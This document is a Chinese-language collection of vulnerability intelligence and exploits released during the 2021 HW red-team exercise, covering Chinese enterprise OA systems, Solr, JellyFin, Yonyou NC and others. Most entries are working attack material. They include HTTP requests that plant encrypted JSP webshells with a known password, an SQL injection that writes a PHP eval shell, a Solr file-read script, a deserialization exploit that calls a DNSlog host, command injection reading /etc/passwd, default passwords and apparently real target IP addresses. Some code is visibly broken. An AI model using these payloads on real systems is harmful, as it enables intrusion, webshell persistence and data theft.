2021HW期间公布的部分漏洞及利用方式(部分附POC、EXP)

索引

0x01 志远OA任意用户登录 0x02 dzzoffice 前台RCE 0x03 JellyFin任意文件读取
0x04 帆软 V9getshell【历史漏洞】 0x05 泛微 OA 8 前台SQL注入 0x41 Create Alibaba Nacos认证绕过
0x06 泛微 OA 9前台无限制getshell 0x07 和信创天远程桌面命令执行 0x08 默安蜜罐管理平台未授权问【官方辟谣】
0x09 天擎越权访问【官方辟谣】 0x10 天擎前台SQL注入漏洞【历史漏洞】 0x11 天融信数据防泄漏系统(LDP)越权修改管理员密码【历史漏洞】
0x11 蓝凌OA任意写入漏洞 0x12 禅道11.6 SQL注入【历史漏洞】 0x13 Apache Solr 任意文件读取漏洞【历史漏洞】
0x14 Apache solr SSRF(服务器端请求伪造) 0x15 致远OA ajax.do 文件上传漏洞【历史漏洞】 0x16 亿邮电子邮件系统远程命令执行
0x17 其他漏洞信息 0x18 用友NC 反序列化利用 0x19 用友NC协同管理软件存在目录遍历漏洞
0x20 金山终端安全系统 V8存在默认口令 0x21 金山终端安全系统 V8/V9存在文件上传漏洞 0x22 齐治堡垒机某版本任意用户登录
0x23 Coremail 邮件系统任意文件上传漏洞【历史漏洞】 0x24 Apache Struts2补丁绕过0day(实际为S2-052)【无POC】 0x25 其他信息
0x26 浪潮 ClusterEngineV4.0 任意命令执行 0x27 志远OA session泄露&&任意文件上传漏洞 0x28 奇安信 网康下一代防火墙RCE
0x29 其他信息 0x30 Create D-Link DCS系列监控账号密码信息泄露 0x31 HIKVISION 流媒体管理服务器 后台任意读取
0x32 HIKVISION 流媒体管理服务器 存在默认口令 0x33 Kyan 网络监控设备 账号密码泄露漏洞 0x34 Wayos AC集中管理系统默认口令
0x35 WordPress 插件SuperForms任意上传 0x36 Zyxel NBG2105身份验证绕过 0x37 weblogic的T3反序列化RCE
0x38 中新金盾信息安全管理系统存在默认密码 0x39 好视通视频会议平台存在默认口令&&任意文件下载 0x40 安天追影威胁分析系统越权访问漏洞

HW开始之前的

0x01 志远OA任意用户登录

4月8号安全情报

4月8日15时,最新传出WPS-0day利用方式,通过点击触发WPS内置浏览器RCE
4月8日12时,有消息传出齐治堡垒机存在命令执行漏洞,poc疑似已流出
4月8日12时,网传深信服EDR存在命令执行漏洞,poc疑似已流出
4月8日12时,网传深信服VPN存在无条件RCE漏洞,poc疑似已流出
4月8日12时,网传jackson存在反序列化漏洞,poc疑似已流出
4月8日12时,网传CoreMai存在命令执行漏洞, poc疑似已流出
4月8日12时,网传用友NC6.5版本存在反序列化命令执行漏洞,poc疑似已流出
4月8日12时,网传dubbo存在反序列化命令执行漏洞,poc疑似已流出
4月8日12时,网传weblogic存在反序列化命令执行漏洞,poc疑似已流出
4月8日11时,网传和信创天云桌面系统全版本存在命令执行,文件上传,poc已流出
4月8日11时,网传红帆0A任意文件写入漏洞,poc疑似已流出
4月8日11时,网传exchange、 致远、shiro 存在0day漏洞,利用方式疑似已流出
4月8日11时,网传金蝶K3Cloud全版本存在命令执行,poc疑似已流出
4月8日11时,网传用友U8Cloud版本存在命令执行,poc疑似已流出
4月8日11时,网传h3c计算管理平台2016年版存在任意账户添加,poc疑似已流出
4月8日11时,网传启明星辰天清汉马USG防火墙存在逻辑缺陷,poc疑似已流出
4月8日10时,有消息传出天眼存在0day漏洞,poc已流出

0x02 dzzoffice 前台RCE

项目地址

https://github.com/zyx0814/dzzoffice/releases/

漏洞前提

首先需要获取到authkey 这个可以通过爆破或者其他的方式获取到具体的这个请看文章

我现在的环境的key为:3090dfHwzmw9lsC3

加密脚本

<?php 
function authcode_config($string,$key, $operation = 'DECODE', $expiry = 0)
{
$ckey_length = 4;
$key = md5($key);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);

$result = '';
$box = range(0, 255);

$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}

for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}

for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}

if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}

echo base64_encode(authcode_config("disk::..././..././..././shell.php",md5('3090dfHwzmw9lsC3'),'ENCODE'));

输出的加密结果

构造数据包:

POST /core/api/wopi/index.php?access_token=1&action=contents&path=ZmM0OWp3bDgxbDE3WlhocFlCVUl4ZDFvRkNYeDRVaGtQbklJYlVSUjV2VjRzLzBwUkJ0Y051ZHl4QzVITFlvN205cENqZktDY1lyNHRQQ0pWblU= HTTP/1.1
Host: word.com
Content-Length: 18
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://word.com
Referer: http://word.com/user.php?mod=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?php phpinfo();?>

4月9号安全情报

0x03 JellyFin任意文件读取

GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1 
GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1 
GET 
/Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09b 
f3d8f7 HTTP/1.1 

0x04 帆软 V9getshell【历史漏洞】

FineReport V9

注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat

启动帆软后默认存在的 JSP 文件:

比如:/tomcat-7.0.96/webapps/ROOT/index.jsp

覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:

POST /WebReport/ReportServer? 
op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1 
Host: 192.168.169.138:8080 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/81.0.4044.92 Safari/537.36 
Connection: close 
Accept-Au: 0c42b2f264071be0507acea1876c74 
Content-Type: text/xml;charset=UTF-8 
Content-Length: 675 

{"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends 
ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return 
super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null) {String 
k=(\"\"+UUID.randomUUID()).replace(\"- 
\",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher 
c=Cipher.getInstance(\"AES\");c.init(2,new 
SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new 
U(this.getClass().getClassLoader()).g(c.doFinal(new 
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta 
nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

0x05 泛微 OA 8 前台SQL注入

POC

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点

使用Payload查询数据库中sysadmin的密码

Select password as id from HrmResourceManager 
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%2 
0id%20from%20HrmResourceManager 

0x06 泛微 OA 9前台无限制getshell

漏洞位置:

/page/exportImport/uploadOperation.jsp

文件上传位置:

view-source:http://112.91.144.90:5006/page/exportImport/fileTransfer/1.jsp

wiki POC 链接https://github.com/PeiQi0/PeiQi-WIKI-POC/commit/f5fb98b0cc2c9dcc9b8adce41479cf836265419a

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 397
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
dnt: 1
x-forwarded-for: 127.0.0.1
Connection: close
------WebKitFormBoundary6XgyjB6SeCArD3Hc
Content-Disposition: form-data; name="file"; filename="peiqi.jsp"
Content-Type: application/octet-stream
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundary6XgyjB6SeCArD3Hc--
​```

地址: /page/exportImport/fileTransfer/peiqi.jsp

默认密码 rebeyond

0x07 和信创天远程桌面命令执行

POST /Upload/upload_file.php?l=1 HTTP/1.1 
Host: x.x.x.x 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/87.0.4280.141 Safari/537.36 
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 
Referer: x.x.x.x 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 
Connection: close 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv 
Content-Length: 164

------WebKitFormBoundaryfcKRltGv 
Content-Disposition: form-data; name="file"; filename="1.png" 
Content-Type: image/avif 
1
------WebKitFormBoundaryfcKRltGv--

0x08 默安蜜罐管理平台未授权问【官方辟谣】

漏洞信息

幻阵是默安科技首创的一款基于攻击混淆与欺骗防御技术的威胁检测防御系统,由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址,攻击者难以进行访问,且尽管可以访问也只能让幻阵执行ping指令,不会造成任何安全隐患。

漏洞危害

由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。

官方辟谣

默安科技关注到业内有人散布“默安科技幻阵管理后台存在认证绕过漏洞”的不实消息,特此作出如下说明。

0x09 天擎越权访问【官方辟谣】

POC

GET /api/dbstat/gettablessize HTTP/1.1 

官方:近期,HW期间泄露情报,在Web登录界面且未登录的情况下会显示提示信息,并且会涉及用户组织,功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口,不存在漏洞。

0x10 天擎前台SQL注入漏洞【历史漏洞】

PoC

https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop table O;--

利用方式

将首先创建新的数据库表,后将数据库内容更名为webshell的目标名,最后删除表清理痕迹。

官方辟谣

该漏洞为内部已知问题,并且在2020年护网前的版本已经修复。

0x11 天融信数据防泄漏系统(LDP)越权修改管理员密码【历史漏洞】

漏洞信息:

天融信数据防泄漏系统越权修改管理员密码,该漏洞为2020年8月17号收到历史情报,非近期HW期间漏洞。

POC

默认用户superman的uid=1
POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1

0x11 蓝凌OA任意写入漏洞

POC

/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]

0x12 禅道11.6 SQL注入【历史漏洞】

漏洞信息

11.6版本存在SQL注入漏洞,该漏洞为Nday ,非HW期间0DAY

漏洞验证

注入来源于禅道采用的pathinfo,在以下URL中

http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

对路径的解析为

getModel-<Model名字>-<Method名字>-<参数名字>=<参数的值>

0x13 Apache Solr 任意文件读取漏洞【历史漏洞】

漏洞信息

该漏洞是由于Apache Solr在默认安装时不会开启身份验证,攻击者在未授权情况下访问Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,进而通过构造恶意请求,执行SSRF攻击,读取目标服务器的任意文件。

影响范围

Apache Solr <= 8.8.1

POC

http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd  (db为存在的应用名) 

POC2

http://ip//solr/db/debug/dump?param=ContentStreams(db为存在的应用名) 
POST提交:stream.url=file:///etc/passwd 
# solr任意文件下载漏洞poc
# __coding=utf-8__
import requests
import json
import argparse

TIMEOUT = 20


def run(target: str, action: str):
    try:
        admin_url = target + "/solr/admin/cores?indexInfo=false&wt=json"
        response = requests.get(admin_url, verify=False, timeout=TIMEOUT)
        if response.status_code == 200 or "name" in response.text:
            data = json.loads(response.content)
            for i in data["status"]:
                key = data["status"][i]["name"]
                return attack(key, target, action)
    except Exception as e:
        error = "[-] {} run error:{}".format(target, str(e))
        raise RuntimeError(error)
    return None


def attack(core_name: str, target: str, action: str):
    session = requests.session()
    config_url = target + "/solr/" + core_name + "/config"
    json_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
    response = session.post(config_url, data=json.dumps(json_data), timeout=TIMEOUT)
    if response and 200 != response.status_code: return None

    dump_url = target + "/solr/" + core_name + "/debug/dump?param=ContentStreams"
    dump_data = {"stream.url": action}
    response = session.post(dump_url, data=dump_data, timeout=TIMEOUT)
    if response is None:
        return None
    elif 200 == response.status_code:
        content = json.loads(response.text)
        return content['streams'][0]['stream']
    elif 500 == response.status_code:
        return response.text
    else:
        return None


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Solr 任意文件下载漏洞POC.')
    parser.add_argument('-u',"--url",
                        help='solr attack target', required=True)
    parser.add_argument('-a', '--action',
                        help='file or url', required=True)
    args = parser.parse_args()
    print("[+] check {} ,action:get {}".format(args.url, args.action))
    result = run(args.url, args.action)
    if result is None: print("[-] Not found vuln")
    print("[+] The result is as follows:\n{}".format(result))

0x14 Apache solr SSRF(服务器端请求伪造)

影响版本

Apache Solr < 8.8.2

POC

/solr/db/replication\?command=fetchindex\&masterUrl=http://xxxx

参考链接

https://github.com/keven1z/SolrfilereadPOC

0x15 致远OA ajax.do 文件上传漏洞【历史漏洞】

漏洞信息

由于致远OA旧版本某些接口存在权限绕过漏洞,攻击者通过特制的HTTP请求将导致接口的权限机制被绕过,并结合某些接口功能实现在未授权情况下上传恶意文件,从而控制目标主机,经验证,该漏洞为2020年12月29日,致远官网发布的2020年10-12月安全通告中历史漏洞。

影响范围

致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x

POC

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%60%0C%C3%BBQ%C2%96V%C2%9D%C2%87%C2%9F%C2%A0%C3%8C%C3%9D%C2%81%2C%C3%B0%10%C2%AA%3D%C3%98%C2%89%C3%A9%0D%C3%8CR%C3%A2rcVZ%06%C2%B9%2B%0A%C2%B7-%C2%AEel%C3%A8%2CU%16%C3%8C%C2%92r%C3%8D%C2%A5%01%C3%84%C3%B3%02%C3%B0z%C2%B1%C3%86J%C3%A9jc%C3%B98x%29%C2%8F%C3%A2%22%C2%B65%C3%89%C2%87X%27%C2%80C%C2%A5%1B%C2%B1%C3%A1F%1B%12%29%1A%3E%3B%C2%B1r%C3%9Db5%05X%C2%8F%C2%A0%C2%888%5B%13%C2%AE%C2%96%01%C2%91%24%C2%A2%1C%C2%88c%02k%7C%C2%BC%C3%A0%2CM%18%C3%90%C3%B7l%1D%26Y%C3%83%C2%9B%7Ea%C3%B1%2B%01%2C%C3%95%C3%B2S%19%C3%85%C2%B5%C2%8DM%21%C2%87R%C2%B9%C2%8B%C2%AA%7F%00%C3%BF%C3%B2%C3%8D%16%C3%B5%C3%88%15%17%C3%842%C3%95%C3%94%C3%A5%C2%86%C2%8F%C2%92%C2%A8d%C2%96%C2%A9%C3%9C%C2%A4%C3%85%C3%91%C2%B7%C3%8D%C2%80%C2%B5%0D%C3%A1%0C%C3%88dFun%C2%80%C2%ADJ%C3%8BP%11%C2%88s%5D%C2%9E%C2%B7z%07q%1CP%0C%22%C2%89%C2%9B%C3%94%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%959%C3%86%C3%86%C3%9FsU%00%C3%B8%C2%8Do%C2%93+%C3%B4L%15I%C2%8B%1CZ%21%1A%C3%91%C3%B8Xh%C2%AE%0Ai%C3%99%C3%9A%C2%AD%C2%B1%C2%8Al%C2%8C%0A%C3%BB%C3%98b%C3%8B%C2%A2%C2%94m%C2%A6U%C2%B8%C3%86%15r1d%C2%9D%C3%A9yt2%C3%99g%C2%9A%C3%93%3A%C3%AFg%C3%9B%C2%A8%C3%B5V%01%C3%8D%01%C3%8D%C3%9F%3Do%C2%B1%12%01%C2%8C%C2%AEP%C2%AC%10%C2%9C%09%07%C2%B8%5C%C2%A5.%06%C2%BEscC%C3%BB%C2%B0%1F%C3%98%C2%87%0D%C3%99%1A6%C2%B2%22%C3%BD%C2%BC%3DH%03%2B%C2%94F%C2%80%C3%93oM%0DB%C3%A1%0AM%C3%95%C2%B0%C2%8Cj%60k%7E%085%29s%C3%88y%C2%B4%C3%A7%C3%90%C3%95ic%1C%C2%BF%C3%91k%0C%11%C2%9C%23ZW5p%C2%B1%C2%82%C3%A4%C3%A9j%C2%A2%C3%AA%C2%9BP%3E%C3%A4%C3%91%C2%9A%C3%86%C3%A0%C2%98%C3%BBd%13V%C2%85m%02%C3%BF%C3%88%C3%A9Q%1D%C2%AB%C3%86%C3%A9%C3%82%C2%91%C2%9F+%C2%8B%C3%B8%C3%89%C2%87%3Fc%C3%BB%C3%97%3FS%C2%99H%C2%A1%C2%AC5%C3%B2i%C2%9D%2F%40%C3%BCt%C3%BD%C2%86%C2%AF%C2%9DG.%C3%96yZ%C2%9F%04%C2%8AA%0AH%C2%A3%C3%97%C3%96%C2%A7%C3%96k%C3%BC%C3%BA%C2%B56%C3%B2%C3%B4L%C3%A5+%C2%B1%C2%88pvY%C2%9B%C3%A6c%C2%91%C3%89%C2%A2%C2%80+%C2%99%C3%9C%C2%A01%2C%5C%03%C3%9D%C3%A8%C3%9Bt%C2%AF%2B%0B%25R%C3%A74%C2%AF%C3%A5%C3%9D%C2%AEh%C3%BA%C2%83S%C3%91%3E%C3%96%C2%B1M%7BU%5E%C2%AE%100u%04%C3%B8%7Das%3A%7B%C3%84%C3%BA%C3%9B%1F%05%C2%A8i%3A%C2%B3.%3E%26%C3%94%C3%8F%C2%94%C3%86%40%C3%A3%C2%87%2B7VX%C3%8B%10%22%1A%1F%C3%B5C%C2%AF%C2%A0%C2%B1%C3%88%00%09%C2%9A%C2%9E%C3%9Es%C3%A3%02%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7%10%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%A8Z%C2%B6u%5D%C2%95.%C2%BF%7F%7C%C2%9Fq%26%2B%C3%A2%3E%0E3%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07%12H%C3%87%1C%C3%9E%C3%AFv%C3%82%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFIq%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87-%C3%93o%18%14%C3%B7%3E%C2%82%C3%BF%C2%9F.%40I%C3%A6Q%C3%87%7E%7C%C2%AF%C2%B7+%25%C2%A0wb%C2%B2%C3%9C%C3%89C%C3%80TU%C3%95%7Bx%C3%AD%C3%BE%C2%A0%C2%AB%C2%91%C2%AE%C3%87%C3%97%C3%BA%C3%8E%2F%C2%85%C3%97%C3%BD%C3%BB_%2F%07M%C2%ADU%05%00%00

冰蝎3默认japx马pass:rebeyond

webshell地址:http://xxx.xxx.xxx.xxx/seeyon/mmd.jspx

成功返回

HTTP/1.1 500

{
"message":null,
"code":"0614448583",
"details":null
}

0x16 亿邮电子邮件系统远程命令执行

参考链接 https://github.com/Tas9er/EYouMailRCE

tools EYouMailRCE-master.zip

POC

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: 192.168.10.1
Content-Length: 25
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
Connection: close

type='|cat /etc/passwd||'

0x17 其他漏洞信息

1、MYBB SQL 注入漏洞(CNVD-2021-25709)【可信度 100%】
	MyBB 是᳿款免费的开源论坛软件。MyBB 1.8.26 之前版本的主题属性存在 SQL 注入漏洞。
3、用友 NC 1DAY 反序列化【可信度 100%】 
	用友 NC 面向集团企业的世界级高端管理软件,发现存在任意文件上传漏洞,利用 apache commonscollections库可执行反序列化。
4、钓鱼邮件【可信度 100%】 
	来源网络情报,发现钓鱼邮件内含有恶意 execl 文件,文件点击可造成远程控制等威胁,微步在线已验 证。 
        1)封禁 IP192.31.96.152;
        2)注意恶意邮件后缀@rainmetal.cn,不要点击此类邮件后缀发送的邮件。
5、和信创天云桌面命令执行漏洞任意文件上传【可信度 60%】 
	和信下᳿代云桌面系统(VENGD),是国内领先的基于 NGD架构的桌面虚拟化 产品,它融合了 VDI、VOI、IDV 三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的 同时更能充分利用前端资源,和信下᳿代云桌面不仅可以满足随时随地移动办公的需求,更可以在窄带环 境下实现 3D 高清播放和外设硬件的全面兼容,满足大规模终端的管理、安全、运维需求。疑似和信创天 云桌面存在任意文件上传漏洞。
7、DZZOFFICE 最新版 RCE【可信度 100%】
    DzzOffice是一款开源的云存储与应用管理工具,主要可用于企业管理阿里云、亚马逊等云存储等空间, 把空间可视化分配给成员使用。发现最新版存在 RCE,经验证参数 bz 存在 SQL 注入漏洞。
8、深信服和致远 OA 文件上传漏洞情报【可信度 60%】 
    该情报属于网络情报暂无相关细节进行验证。
9、F5 BIG-IP 16.0.X-ICONTROL REST 远程代码执行【可信度 100%】 
	F5 BIG-IP 是美国 F5 公司的᳿款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平 台。F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过 BIG-IP 管理界面和自身 IP 地址对iContronl REST 接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。
10、多款 HUAWEI 产品内存泄露漏洞【可信度 100%】 
	Huawei  IPS Moudule 等都是中国华为(Huawei)公司的产品。Huawei IPS Moudule 是一款入侵防御系统 (IPS)模块。NGFW Moudule 是一款下一代防火墙(NGFW)模块。Secospace USG6600 是᳿款下一代防 火墙产品。多款 Huawei产品存在内存泄露漏洞。由于产品在某些场景下对内存释放处理不当,远程攻击 者可能会发送特定报文来触发该漏洞。成功利用该漏洞可能导致服务异常。
11、通达 OA V11,7 在线任意用户登录【可信度 100%】 
	通达 OA V11.7 版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外᳿个方面就 是编译在线的 瀈濼濷 值进行判断。
12、CVE-2021-21975:VREALIZE OPERATIONS MANAGER SSRF【可信度 100%】 
	2021 年 3 月 31 日,VMWare 官方发布了 VMSA-2021-0004 的风险通告,漏洞编号为 CVE-2021-21975, CVE-2021-21983,漏洞等级:高危,漏洞评分 8.6。CVE-2021-21975:通过网络访问vRealize Operations Manager  API 的恶意攻击者可以执行服务器端请求伪造攻击,以窃取管理凭据。

4月10号安全情报

0x18 用友NC 反序列化利用

漏洞关注点

/service/~xbrl/XbrlPersistenceServlet

EXP

import requests
import threadpool
import urllib3import sys
import base64
ip = ""
dnslog = "\x79\x37\x64\x70\" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)

0x19 用友NC协同管理软件存在目录遍历漏洞

漏洞关注点

/NCFindWeb?service=IPreAlertConfigService&filename=

0x20 金山终端安全系统 V8存在默认口令

默认口令

admin/admin

